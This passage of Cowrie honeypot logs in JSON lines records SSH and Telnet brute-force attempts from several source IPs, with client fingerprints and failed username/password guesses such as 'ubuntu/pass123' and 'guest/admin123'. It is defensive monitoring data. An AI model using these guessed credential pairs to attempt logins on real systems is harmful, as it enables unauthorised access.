a-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:11:32.726287Z","src_ip":"134.199.174.250","session":"7c94397c0ab3"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"pass123","message":"login attempt [ubuntu/pass123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:11:34.028020Z","src_ip":"134.199.174.250","session":"7c94397c0ab3"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:11:35.352782Z","src_ip":"134.199.174.250","session":"7c94397c0ab3"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":39522,"dst_ip":"1.2.3.4","dst_port":22,"session":"d02f5b013518","protocol":"ssh","message":"New connection: 139.59.14.27:39522 (1.2.3.4:22) [session: d02f5b013518]","sensor":"my-vps","timestamp":"2025-09-08T13:11:52.939327Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:11:52.939983Z","src_ip":"139.59.14.27","session":"d02f5b013518"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:11:53.304177Z","src_ip":"139.59.14.27","session":"d02f5b013518"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"P@ssw0rd@123","message":"login attempt [ubuntu/P@ssw0rd@123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:11:54.788574Z","src_ip":"139.59.14.27","session":"d02f5b013518"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:11:56.141916Z","src_ip":"139.59.14.27","session":"d02f5b013518"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":38352,"dst_ip":"1.2.3.4","dst_port":22,"session":"8608e7bb9629","protocol":"ssh","message":"New connection: 134.199.174.250:38352 (1.2.3.4:22) [session: 8608e7bb9629]","sensor":"my-vps","timestamp":"2025-09-08T13:12:02.554474Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:12:02.662909Z","src_ip":"134.199.174.250","session":"8608e7bb9629"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:12:02.850749Z","src_ip":"134.199.174.250","session":"8608e7bb9629"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123abc","message":"login attempt [ubuntu/123abc] failed","sensor":"my-vps","timestamp":"2025-09-08T13:12:04.237406Z","src_ip":"134.199.174.250","session":"8608e7bb9629"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:12:05.625385Z","src_ip":"134.199.174.250","session":"8608e7bb9629"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49936,"dst_ip":"1.2.3.4","dst_port":22,"session":"541fe92b8c81","protocol":"ssh","message":"New connection: 212.227.235.229:49936 (1.2.3.4:22) [session: 541fe92b8c81]","sensor":"my-vps","timestamp":"2025-09-08T13:12:09.320856Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:12:09.321692Z","src_ip":"212.227.235.229","session":"541fe92b8c81"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:12:09.658378Z","src_ip":"212.227.235.229","session":"541fe92b8c81"}
{"eventid":"cowrie.login.failed","username":"test2","password":"!","message":"login attempt [test2/!] failed","sensor":"my-vps","timestamp":"2025-09-08T13:12:11.164536Z","src_ip":"212.227.235.229","session":"541fe92b8c81"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:12:12.535755Z","src_ip":"212.227.235.229","session":"541fe92b8c81"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58563,"dst_ip":"1.2.3.4","dst_port":23,"session":"b8144a71063f","protocol":"telnet","message":"New connection: 212.227.235.229:58563 (1.2.3.4:23) [session: b8144a71063f]","sensor":"my-vps","timestamp":"2025-09-08T13:12:28.757553Z"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":44854,"dst_ip":"1.2.3.4","dst_port":22,"session":"2268d8c4af40","protocol":"ssh","message":"New connection: 134.199.174.250:44854 (1.2.3.4:22) [session: 2268d8c4af40]","sensor":"my-vps","timestamp":"2025-09-08T13:12:33.280981Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:12:33.281990Z","src_ip":"134.199.174.250","session":"2268d8c4af40"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:12:33.608406Z","src_ip":"134.199.174.250","session":"2268d8c4af40"}
{"eventid":"cowrie.login.failed","username":"guest","password":"1234567890","message":"login attempt [guest/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T13:12:34.670047Z","src_ip":"134.199.174.250","session":"2268d8c4af40"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:12:36.096118Z","src_ip":"134.199.174.250","session":"2268d8c4af40"}
{"eventid":"cowrie.session.closed","duration":31.311315059661865,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:13:00.068060Z","src_ip":"212.227.235.229","session":"b8144a71063f"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":54338,"dst_ip":"1.2.3.4","dst_port":22,"session":"c61850c5e075","protocol":"ssh","message":"New connection: 134.199.174.250:54338 (1.2.3.4:22) [session: c61850c5e075]","sensor":"my-vps","timestamp":"2025-09-08T13:13:05.188100Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:13:05.189154Z","src_ip":"134.199.174.250","session":"c61850c5e075"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:13:05.485237Z","src_ip":"134.199.174.250","session":"c61850c5e075"}
{"eventid":"cowrie.login.failed","username":"guest","password":"password1","message":"login attempt [guest/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T13:13:06.959446Z","src_ip":"134.199.174.250","session":"c61850c5e075"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:13:08.354184Z","src_ip":"134.199.174.250","session":"c61850c5e075"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":56050,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a239928933e","protocol":"ssh","message":"New connection: 139.59.14.27:56050 (1.2.3.4:22) [session: 3a239928933e]","sensor":"my-vps","timestamp":"2025-09-08T13:13:20.204436Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:13:20.205343Z","src_ip":"139.59.14.27","session":"3a239928933e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:13:20.553014Z","src_ip":"139.59.14.27","session":"3a239928933e"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"2025","message":"login attempt [nexus/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T13:13:21.999528Z","src_ip":"139.59.14.27","session":"3a239928933e"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:13:23.342922Z","src_ip":"139.59.14.27","session":"3a239928933e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58256,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb2c8b720119","protocol":"ssh","message":"New connection: 212.227.235.229:58256 (1.2.3.4:22) [session: bb2c8b720119]","sensor":"my-vps","timestamp":"2025-09-08T13:13:24.461428Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:13:24.462629Z","src_ip":"212.227.235.229","session":"bb2c8b720119"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:13:24.722279Z","src_ip":"212.227.235.229","session":"bb2c8b720119"}
{"eventid":"cowrie.login.failed","username":"tunnel","password":"tunnel","message":"login attempt [tunnel/tunnel] failed","sensor":"my-vps","timestamp":"2025-09-08T13:13:25.842790Z","src_ip":"212.227.235.229","session":"bb2c8b720119"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:13:27.105873Z","src_ip":"212.227.235.229","session":"bb2c8b720119"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":49236,"dst_ip":"1.2.3.4","dst_port":22,"session":"a615b8349dcb","protocol":"ssh","message":"New connection: 134.199.174.250:49236 (1.2.3.4:22) [session: a615b8349dcb]","sensor":"my-vps","timestamp":"2025-09-08T13:13:36.382751Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:13:36.384254Z","src_ip":"134.199.174.250","session":"a615b8349dcb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:13:36.675305Z","src_ip":"134.199.174.250","session":"a615b8349dcb"}
{"eventid":"cowrie.login.failed","username":"guest","password":"admin123","message":"login attempt [guest/admin123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:13:37.949800Z","src_ip":"134.199.174.250","session":"a615b8349dcb"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:13:39.243414Z","src_ip":"134.199.174.250","session":"a615b8349dcb"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":49828,"dst_ip":"1.2.3.4","dst_port":22,"session":"b34592b94f54","protocol":"ssh","message":"New connection: 134.199.174.250:49828 (1.2.3.4:22) [session: b34592b94f54]","sensor":"my-vps","timestamp":"2025-09-08T13:14:07.671036Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:14:07.672450Z","src_ip":"134.199.174.250","session":"b34592b94f54"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:14:07.961750Z","src_ip":"134.199.174.250","session":"b34592b94f54"}
{"eventid":"cowrie.login.failed","username":"guest","password":"1234","message":"login attempt [guest/1234] failed","sensor":"my-vps","timestamp":"2025-09-08T13:14:08.933012Z","src_ip":"134.199.174.250","session":"b34592b94f54"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:14:10.233852Z","src_ip":"134.199.174.250","session":"b34592b94f54"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64908,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c189f662143","protocol":"ssh","message":"New connection: 217.72.205.35:64908 (1.2.3.4:22) [session: 9c189f662143]","sensor":"my-vps","timestamp":"2025-09-08T13:14:36.006946Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:14:36.008381Z","src_ip":"217.72.205.35","session":"9c189f662143"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":34420,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0cbb3acb6cc","protocol":"ssh","message":"New connection: 134.199.174.250:34420 (1.2.3.4:22) [session: e0cbb3acb6cc]","sensor":"my-vps","timestamp":"2025-09-08T13:14:39.463632Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:14:39.464157Z","src_ip":"134.199.174.250","session":"e0cbb3acb6cc"}
